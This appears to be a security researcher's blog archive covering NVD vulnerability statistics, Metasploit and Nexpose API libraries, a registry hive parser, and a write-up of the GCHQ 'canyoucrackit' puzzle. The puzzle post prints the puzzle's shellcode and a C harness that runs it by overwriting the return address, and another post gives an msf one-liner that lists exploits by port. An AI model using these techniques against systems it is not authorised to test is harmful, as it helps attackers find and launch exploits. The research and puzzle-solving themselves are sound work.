2004 had 3 vulns of type:  Cryptographic Issues
2004 had 3 vulns of type:  Format String Vulnerability
2004 had 2 vulns of type:  Race Conditions
2004 had 2 vulns of type:  Link Following
2004 had 1 vulns of type:  Numeric Errors
2004 had 1 vulns of type:  OS Command Injections
2004 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
Total vulns in 2004 with CWE: 141
Percentage of vulns with CWE: 5.28287748220307%


Year 2005 has 4684 vulnerabilities
2005 had 64 vulns of type:  Buffer Errors
2005 had 48 vulns of type:  SQL Injection
2005 had 32 vulns of type:  Permissions, Privileges, and Access Control
2005 had 31 vulns of type:  Resource Management Errors
2005 had 28 vulns of type:  Cross-Site Scripting
2005 had 21 vulns of type:  Input Validation
2005 had 20 vulns of type:  Code Injection
2005 had 18 vulns of type:  Information Leak / Disclosure
2005 had 15 vulns of type:  Numeric Errors
2005 had 10 vulns of type:  Path Traversal
2005 had 5 vulns of type:  Link Following
2005 had 4 vulns of type:  Authentication Issues
2005 had 3 vulns of type:  Cryptographic Issues
2005 had 3 vulns of type:  Configuration
2005 had 2 vulns of type:  Credentials Management
2005 had 2 vulns of type:  Race Conditions
2005 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2005 had 1 vulns of type:  Format String Vulnerability
2005 had 1 vulns of type:  OS Command Injections
Total vulns in 2005 with CWE: 309
Percentage of vulns with CWE: 6.59692570452605%


Year 2006 has 7043 vulnerabilities
2006 had 199 vulns of type:  Code Injection
2006 had 145 vulns of type:  Buffer Errors
2006 had 87 vulns of type:  Cross-Site Scripting
2006 had 84 vulns of type:  SQL Injection
2006 had 74 vulns of type:  Resource Management Errors
2006 had 63 vulns of type:  Input Validation
2006 had 50 vulns of type:  Permissions, Privileges, and Access Control
2006 had 37 vulns of type:  Numeric Errors
2006 had 29 vulns of type:  Information Leak / Disclosure
2006 had 21 vulns of type:  Path Traversal
2006 had 17 vulns of type:  Format String Vulnerability
2006 had 14 vulns of type:  Authentication Issues
2006 had 8 vulns of type:  Cryptographic Issues
2006 had 7 vulns of type:  Race Conditions
2006 had 6 vulns of type:  Configuration
2006 had 5 vulns of type:  Credentials Management
2006 had 3 vulns of type:  Cross-Site Request Forgery (CSRF)
2006 had 2 vulns of type:  OS Command Injections
2006 had 1 vulns of type:  Link Following
Total vulns in 2006 with CWE: 852
Percentage of vulns with CWE: 12.0971177055232%


Year 2007 has 6505 vulnerabilities
2007 had 451 vulns of type:  Buffer Errors
2007 had 366 vulns of type:  Cross-Site Scripting
2007 had 296 vulns of type:  Code Injection
2007 had 263 vulns of type:  SQL Injection
2007 had 229 vulns of type:  Permissions, Privileges, and Access Control
2007 had 228 vulns of type:  Input Validation
2007 had 164 vulns of type:  Path Traversal
2007 had 107 vulns of type:  Numeric Errors
2007 had 104 vulns of type:  Resource Management Errors
2007 had 96 vulns of type:  Information Leak / Disclosure
2007 had 69 vulns of type:  Authentication Issues
2007 had 41 vulns of type:  Cross-Site Request Forgery (CSRF)
2007 had 36 vulns of type:  Configuration
2007 had 31 vulns of type:  Format String Vulnerability
2007 had 25 vulns of type:  Link Following
2007 had 24 vulns of type:  Credentials Management
2007 had 19 vulns of type:  Cryptographic Issues
2007 had 18 vulns of type:  Race Conditions
2007 had 6 vulns of type:  OS Command Injections
Total vulns in 2007 with CWE: 2573
Percentage of vulns with CWE: 39.554189085319%


Year 2008 has 7031 vulnerabilities
2008 had 1480 vulns of type:  SQL Injection
2008 had 981 vulns of type:  Cross-Site Scripting
2008 had 582 vulns of type:  Buffer Errors
2008 had 574 vulns of type:  Permissions, Privileges, and Access Control
2008 had 467 vulns of type:  Input Validation
2008 had 447 vulns of type:  Path Traversal
2008 had 385 vulns of type:  Code Injection
2008 had 322 vulns of type:  Resource Management Errors
2008 had 222 vulns of type:  Authentication Issues
2008 had 221 vulns of type:  Information Leak / Disclosure
2008 had 177 vulns of type:  Link Following
2008 had 166 vulns of type:  Numeric Errors
2008 had 119 vulns of type:  Cross-Site Request Forgery (CSRF)
2008 had 69 vulns of type:  Credentials Management
2008 had 61 vulns of type:  Cryptographic Issues
2008 had 41 vulns of type:  Configuration
2008 had 33 vulns of type:  Format String Vulnerability
2008 had 25 vulns of type:  Race Conditions
2008 had 12 vulns of type:  OS Command Injections
Total vulns in 2008 with CWE: 6384
Percentage of vulns with CWE: 90.797895036268%


Year 2009 has 4848 vulnerabilities
2009 had 734 vulns of type:  Cross-Site Scripting
2009 had 673 vulns of type:  SQL Injection
2009 had 558 vulns of type:  Buffer Errors
2009 had 329 vulns of type:  Permissions, Privileges, and Access Control
2009 had 266 vulns of type:  Code Injection
2009 had 247 vulns of type:  Input Validation
2009 had 245 vulns of type:  Path Traversal
2009 had 237 vulns of type:  Resource Management Errors
2009 had 164 vulns of type:  Numeric Errors
2009 had 148 vulns of type:  Authentication Issues
2009 had 141 vulns of type:  Information Leak / Disclosure
2009 had 86 vulns of type:  Cryptographic Issues
2009 had 84 vulns of type:  Cross-Site Request Forgery (CSRF)
2009 had 56 vulns of type:  Credentials Management
2009 had 47 vulns of type:  Configuration
2009 had 32 vulns of type:  Race Conditions
2009 had 29 vulns of type:  Link Following
2009 had 23 vulns of type:  Format String Vulnerability
2009 had 11 vulns of type:  OS Command Injections
Total vulns in 2009 with CWE: 4110
Percentage of vulns with CWE: 84.7772277227723%


Year 2010 has 4696 vulnerabilities
2010 had 578 vulns of type:  SQL Injection
2010 had 566 vulns of type:  Cross-Site Scripting
2010 had 536 vulns of type:  Buffer Errors
2010 had 319 vulns of type:  Permissions, Privileges, and Access Control
2010 had 299 vulns of type:  Input Validation
2010 had 270 vulns of type:  Resource Management Errors
2010 had 256 vulns of type:  Path Traversal
2010 had 248 vulns of type:  Code Injection
2010 had 162 vulns of type:  Information Leak / Disclosure
2010 had 154 vulns of type:  Numeric Errors
2010 had 66 vulns of type:  Cross-Site Request Forgery (CSRF)
2010 had 62 vulns of type:  Cryptographic Issues
2010 had 56 vulns of type:  Authentication Issues
2010 had 51 vulns of type:  Credentials Management
2010 had 33 vulns of type:  Race Conditions
2010 had 26 vulns of type:  Link Following
2010 had 21 vulns of type:  Configuration
2010 had 12 vulns of type:  Format String Vulnerability
2010 had 12 vulns of type:  OS Command Injections
Total vulns in 2010 with CWE: 3727
Percentage of vulns with CWE: 79.3654173764906%


Year 2011 has 3733 vulnerabilities
2011 had 648 vulns of type:  Buffer Errors
2011 had 372 vulns of type:  Input Validation
2011 had 367 vulns of type:  Cross-Site Scripting
2011 had 366 vulns of type:  Resource Management Errors
2011 had 295 vulns of type:  Information Leak / Disclosure
2011 had 285 vulns of type:  Permissions, Privileges, and Access Control
2011 had 120 vulns of type:  Numeric Errors
2011 had 107 vulns of type:  SQL Injection
2011 had 92 vulns of type:  Code Injection
2011 had 91 vulns of type:  Path Traversal
2011 had 60 vulns of type:  Authentication Issues
2011 had 57 vulns of type:  Cross-Site Request Forgery (CSRF)
2011 had 57 vulns of type:  Cryptographic Issues
2011 had 34 vulns of type:  Configuration
2011 had 32 vulns of type:  Credentials Management
2011 had 26 vulns of type:  Link Following
2011 had 14 vulns of type:  Race Conditions
2011 had 13 vulns of type:  OS Command Injections
2011 had 8 vulns of type:  Format String Vulnerability
Total vulns in 2011 with CWE: 3044
Percentage of vulns with CWE: 81.5429949102599%
Total: 49439

To be honest, I am a bit dismayed at the quality of the data. 2001 only categorized 1.7% of the vulns recorded (I am sure most, if not all, were added retroactively). The highest percentage of vulns that had been categorized was 90% in 2008. I find it interesting that the first few years are dominated by buffer overflows (perhaps because of poor data), and then around 2008, web vulns become the top recorded and categorized. Perhaps this is because of the vast amount new web technologies emerging. That is, until 2011 where buffer overflows are once again the most. I used the xml files from the NIST and my source code that I used to generate the stats is on github. Using LINQ, so it isn't super speedy. Takes a few minutes. Works with Mono or .NET.

Communicating with your Metasploit server via Mono/.NET

2012-03-31T16:12:00.000-06:00

A few months ago, I released a library that helped integrate Nexpose into your .NET/Mono applications. A few nights ago, I checked in my library that allows communication and integration with Metasploit from your .NET/Mono applications. Very much in beta, and I am not calling it feature complete. Works for the most part, but bugs will be found (and patches accepted!). Take a look at the Example I have to see it in action. It follows the same Session/Manager pattern as the nexpose library does. No pro methods added yet, just core.

What browsers support @import in their CSS?

2012-02-03T22:39:00.006-06:00

I prefer the following CSS:

<html>
<body>
<head>
<style type="text/css">
        @import url(/css/style.css);
      </style>
</head>
</body>
</html>

But not all browsers support @import. I wanted to see exactly which ones didn't so I used browsershots.org with a simple test.

Here are the results: http://browsershots.org/http://volatileminds.net/import_test.html

Black means it supports it. White means it doesn't.

Communicating with your NeXpose server via Mono/.NET

2012-01-11T16:09:00.001-06:00

I have a public repo on github that houses my nexpose-sharp library. It is written in C# and consumes the NeXpose XML API (both 1.1 and 1.2). Here is an example of how easy it is to get all the vuln checks NeXpose has:



using System;

using System.Xml;

using nexposesharp;



namespace nexposeclient

{

class MainClass

{

public static void Main (string[] args)

{

using (NexposeSession session = new NexposeSession("192.168.56.101"))

{

session.Authenticate("nexpose"/*user*/, "nexpose"/*password*/);



using (NexposeManager11 manager = new NexposeManager11(session))

{

XmlDocument vulns = manager.GetVulnerabilityListing();



int i = 0;

foreach (XmlNode vuln in vulns.FirstChild.ChildNodes)

{

string vulnID = vuln.Attributes["id"].Value;



XmlDocument deets = manager.GetVulnerabilityDetails(vulnID);



string title = deets.FirstChild.FirstChild.Attributes["title"].Value;

string severity = deets.FirstChild.FirstChild.Attributes["severity"].Value;



Console.WriteLine(String.Format("{0} has a severity of {1} and an id of {2}", title, severity, vulnID)); 



i++;

}



Console.WriteLine("\n\nTotal vulnerabilities in database: " + i);

}

}

}

}

}

The library has 2 manager implementations. The above example use the 1.1 API. A NexposeManager12 class exists that inherits from NexposeManager11 (available from NeXpose 4.0) and implements the extended 1.2 API (available for NeXpose installations of 4.8+). I am currently in the process of writing some unit tests, which will be committed as soon as possible.

You can grab a copy of NeXpose Community Edition today and try it out!

Reading offline registry hives in pure ruby

2012-01-06T12:31:00.000-06:00

If you have ever wanted to peruse a registry hive on Linux, you know that options are really lacking. Most people wonder why you would even want to read a registry hive on Linux, but it is fairly straightforward when you think of the kind of people who will be traversing through registry hives in the first place. Forensics and reverse engineers will often run Linux.

Last night, I checked in my offline registry hive library written in Ruby. I had written a really crappy one in C# based on key signatures, rather than parsing the actual tree. This library does it correctly, by parsing the tree. It is still in its infancy, but it works well enough. You may view the code here. One day, I hope this gets merged in to the Metasploit trunk in some form or fashion. Tested on Ubuntu 11.10 on ruby 1.9.2p290 (2011-07-09 revision 32553) [x86_64-linux].

root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\Select' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\Select are:
"Current: \x01\x00\x00\x00"
"Default: \x01\x00\x00\x00"
"Failed: \x00\x00\x00\x00"
"LastKnownGood: \x02\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\ControlSet001\Control\Lsa' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The children of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"AccessProviders"
"Audit"
"Credssp"
"Data"
"FipsAlgorithmPolicy"
"GBG"
"JD"
"Kerberos"
"MSV1_0"
"Skew1"
"SSO"
"SspiCache"
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"auditbaseobjects: \x00\x00\x00\x00"
"auditbasedirectories: \x00\x00\x00\x00"
"crashonauditfail: \x00\x00\x00\x00"
"fullprivilegeauditing: \x00\x00\x00\x00"
"Bounds: \x000\x00\x00\x00 \x00\x00"
"LimitBlankPasswordUse: \x01\x00\x00\x00"
"NoLmHash: \x01\x00\x00\x00"
"Notification Packages: s\x00c\x00e\x00c\x00l\x00i\x00\x00\x00\x00\x00"
"Security Packages: k\x00e\x00r\x00b\x00e\x00r\x00o\x00s\x00\x00\x00m\x00s\x00v\x001\x00_\x000\x00\x00\x00s\x00c\x00h\x00a\x00n\x00n\x00e\x00l\x00\x00\x00w\x00d\x00i\x00g\x00e\x00s\x00t\x00\x00\x00t\x00s\x00p\x00k\x00g\x00\x00\x00p\x00k\x00u\x002\x00u\x00\x00\x00\x00\x00"
"Authentication Packages: m\x00s\x00v\x001\x00_\x000\x00\x00\x00\x00\x00"
"LsaPid: \xEC\x01\x00\x00"
"SecureBoot: \x01\x00\x00\x00"
"ProductType: \x02\x00\x00\x00"
"disabledomaincreds: \x00\x00\x00\x00"
"everyoneincludesanonymous: \x00\x00\x00\x00"
"forceguest: \x00\x00\x00\x00"
"restrictanonymous: \x00\x00\x00\x00"
"restrictanonymoussam: \x01\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby#

New metasploit modules in trunk

2011-12-28T16:40:00.000-06:00

Last night HDM checked in a telnetd remote root scanner and exploit module fore BSD-derived telnetd servers (this vuln affects telnet clients as well). We were up late last night working on it. Any testing is appreciated.

Today, sinn3r checked my CorpWatch API modules into trunk. These aid in OSINT research for a company during an engagement.

Finding all exploits with RPORT == X

2011-12-13T20:53:00.000-06:00

This question comes up quite a bit in the IRC channel: How can I see all exploits for a given port? You can do it easily with IRB

msf > irb
>> framework.exploits.each_module { |n,e| x=e.new; print_good("#{e.fullname}: #{x.datastore['RPORT']}") if x.datastore['RPORT'].to_i == 445   }; nil

Just replace 445 with the port you are looking for. If you want aux modules, you may replace framework.exploits with framework.auxiliary.

Can you crack it? (nope, I tried though)

2011-11-30T23:38:00.000-06:00

The UK govt created a challenge to find eligible code crackers. The website is http://www.canyoucrackit.co.uk/.

I got close, but my skills aren't up to par. Here is as far as I got. They give you the following code:

eb 04 af c2 bf a3 81 ec  00 01 00 00 31 c9 88 0c
0c fe c1 75 f9 31 c0 ba  ef be ad de 02 04 0c 00
d0 c1 ca 08 8a 1c 0c 8a  3c 04 88 1c 04 88 3c 0c
fe c1 75 e8 e9 5c 00 00  00 89 e3 81 c3 04 00 00
00 5c 58 3d 41 41 41 41  75 43 48 3d 42 42 42 42
75 3b 5a 89 d1 89 e6 89  df 29 cf f3 a4 89 de 89
d1 89 df 29 cf 31 c0 31  db 31 d2 fe c0 02 1c 06
8a 14 06 8a 34 1e 88 34  06 88 14 1e 00 f2 30 f6
8a 1c 16 8a 17 30 da 88  17 47 49 75 de 31 db 89
d8 fe c0 cd 80 90 90 e8  9d ff ff ff 41 41 41 41

What jumps out at me first are the nops (90 90) in the last line. My mind automagically tells me this is shellcode. I wasn't 100% sure, but it was the only guess I had. I copied the code over into gedit, and made the following adjustments.

\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c
\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00
\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c
\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00
\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42
\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89
\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06
\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6
\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89
\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41

I then saved this into a shellcode.c file:

char shellcode[] = "\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

   printf("done");

}

Running it simply returned the "done" being printed by printf. This told me that the shellcode was at least not crashing, so it was probably valid shellcode. Looks like my first impression was correct. So I jumped to the asm that the shellcode produced to get a better understanding of it:

0000000000601040 :
  601040: eb 04                 jmp    601046 
  601042: af                    scas   %es:(%rdi),%eax
  601043: c2 bf a3              retq   $0xa3bf
  601046: 81 ec 00 01 00 00     sub    $0x100,%esp
  60104c: 31 c9                 xor    %ecx,%ecx
  60104e: 88 0c 0c              mov    %cl,(%rsp,%rcx,1)
  601051: fe c1                 inc    %cl
  601053: 75 f9                 jne    60104e 
  601055: 31 c0                 xor    %eax,%eax
  601057: ba ef be ad de        mov    $0xdeadbeef,%edx
  60105c: 02 04 0c              add    (%rsp,%rcx,1),%al
  60105f: 00 d0                 add    %dl,%al
  601061: c1 ca 08              ror    $0x8,%edx
  601064: 8a 1c 0c              mov    (%rsp,%rcx,1),%bl
  601067: 8a 3c 04              mov    (%rsp,%rax,1),%bh
  60106a: 88 1c 04              mov    %bl,(%rsp,%rax,1)
  60106d: 88 3c 0c              mov    %bh,(%rsp,%rcx,1)
  601070: fe c1                 inc    %cl
  601072: 75 e8                 jne    60105c 
  601074: e9 5c 00 00 00        jmpq   6010d5 
  601079: 89 e3                 mov    %esp,%ebx
  60107b: 81 c3 04 00 00 00     add    $0x4,%ebx
  601081: 5c                    pop    %rsp
  601082: 58                    pop    %rax
  601083: 3d 41 41 41 41        cmp    $0x41414141,%eax
  601088: 75 43                 jne    6010cd 
  60108a: 48 3d 42 42 42 42     cmp    $0x42424242,%rax
  601090: 75 3b                 jne    6010cd 
  601092: 5a                    pop    %rdx
  601093: 89 d1                 mov    %edx,%ecx
  601095: 89 e6                 mov    %esp,%esi
  601097: 89 df                 mov    %ebx,%edi
  601099: 29 cf                 sub    %ecx,%edi
  60109b: f3 a4                 rep movsb %ds:(%rsi),%es:(%rdi)
  60109d: 89 de                 mov    %ebx,%esi
  60109f: 89 d1                 mov    %edx,%ecx
  6010a1: 89 df                 mov    %ebx,%edi
  6010a3: 29 cf                 sub    %ecx,%edi
  6010a5: 31 c0                 xor    %eax,%eax
  6010a7: 31 db                 xor    %ebx,%ebx
  6010a9: 31 d2                 xor    %edx,%edx
  6010ab: fe c0                 inc    %al
  6010ad: 02 1c 06              add    (%rsi,%rax,1),%bl
  6010b0: 8a 14 06              mov    (%rsi,%rax,1),%dl
  6010b3: 8a 34 1e              mov    (%rsi,%rbx,1),%dh
  6010b6: 88 34 06              mov    %dh,(%rsi,%rax,1)
  6010b9: 88 14 1e              mov    %dl,(%rsi,%rbx,1)
  6010bc: 00 f2                 add    %dh,%dl
  6010be: 30 f6                 xor    %dh,%dh
  6010c0: 8a 1c 16              mov    (%rsi,%rdx,1),%bl
  6010c3: 8a 17                 mov    (%rdi),%dl
  6010c5: 30 da                 xor    %bl,%dl
  6010c7: 88 17                 mov    %dl,(%rdi)
  6010c9: 47                    rex.RXB
  6010ca: 49 75 de              rex.WB jne    6010ab 
  6010cd: 31 db                 xor    %ebx,%ebx
  6010cf: 89 d8                 mov    %ebx,%eax
  6010d1: fe c0                 inc    %al
  6010d3: cd 80                 int    $0x80
  6010d5: 90                    nop
  6010d6: 90                    nop
  6010d7: e8 9d ff ff ff        callq  601079 
  6010dc: 41                    rex.B
  6010dd: 41                    rex.B
  6010de: 41                    rex.B
  6010df: 41 00 00              add    %al,(%r8)

Definitely legitimate shellcode. The x86 asm gcc spits out is exactly what I wanted to see. Not only that, but do you see the 0xdeadbeef?

Once I knew I was in the right direction, I loaded the binary into gdb. I through a breakpoint on the printf line with

break printf

and ran the binary. I looked at the stack frame, traversed through the memory and found the strings I suspected were what we were supposed to be looking for. However, they seemed to be all multi-byte characters. I wasn't able to decipher any of them within the time limit. I had found out about the contest about 2 hours before it was over. This took me about an hour to get to traversing the stack for the strings, and I got stuck.

Oh well. Maybe next time if I have more time I can get a bit further.

Easily splitting and storing traceroute data

2011-11-26T12:58:00.001-06:00

Traceroute is very useful, but the data it spits out can be a bit tough to chew on. I came up with this one-liner to make it more CSV compatible so you can Split() on commas and have the correct data where you expect it.

traceroute google.com | sed 's/  /,/g' | sed 's/ ms / ms,/g'

This take load balancers into account as well, so when your route slightly changes during a hop, you can still easily grok the data coming back. Basically, take double-spaces and replace them with a comma. The second sed is what takes the load balancers into account, fixing the output so it is the same as the prior hop test.